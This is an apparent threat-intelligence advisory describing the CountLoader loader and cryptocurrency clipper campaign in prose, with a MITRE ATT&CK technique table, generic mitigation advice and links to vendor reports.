EXECUTIVE SUMMARY
A large-scale threat campaign has been uncovered, leveraging multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence in infected systems. This campaign, attributed to a sophisticated threat actor, primarily targets organizations and individuals in various sectors, with a notable focus on regions in Asia and the United States. The attackers' primary objective is to deploy cryptocurrency clipper malware, which hijacks clipboard activity and redirects cryptocurrency transactions to attacker-controlled addresses.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
A large-scale threat campaign has been uncovered, leveraging multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence in infected systems. This campaign, attributed to a sophisticated threat actor, primarily targets organizations and individuals in various sectors, with a notable focus on regions in Asia and the United States. The attackers' primary objective is to deploy cryptocurrency clipper malware, which hijacks clipboard activity and redirects cryptocurrency transactions to attacker-controlled addresses.[emaillocker id="1283"]
The malware infection process involves a complex chain of events, beginning with the execution of a malicious EXE file. This file launches a PowerShell command, which downloads and executes an obfuscated JavaScript loader known as CountLoader. The loader is executed using mshta.exe, a legitimate Windows utility often abused by malware to run scripts. Once executed, CountLoader performs several tasks, including establishing persistence, contacting multiple C2 servers, and attempting to spread via USB drives. The malware maintains control by creating scheduled tasks, using a custom encrypted communication protocol, and employing in-memory execution and security bypass techniques to evade detection.
This threat is significant for organizations due to its ability to evade detection and maintain persistence in infected systems. The campaign's use of multiple layers of obfuscation and staged payload delivery makes it challenging to detect and recover from. To mitigate this threat, organizations should prioritize patching, monitoring, and maintaining up-to-date endpoint protection. Regular backups and a robust incident response plan are also essential in case of a breach.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Lateral Movement | T1091 | Replication Through Removable Media | — |
| Collection | T1115 | Clipboard Data | — |
| Command and Control | T1573.001 | Encrypted Channel | Symmetric Cryptography |
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/countloader-malware-etherhiding-cryptocurrency-clipper-mcafee/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sinkholing-countloader-insights-into-its-recent-campaign/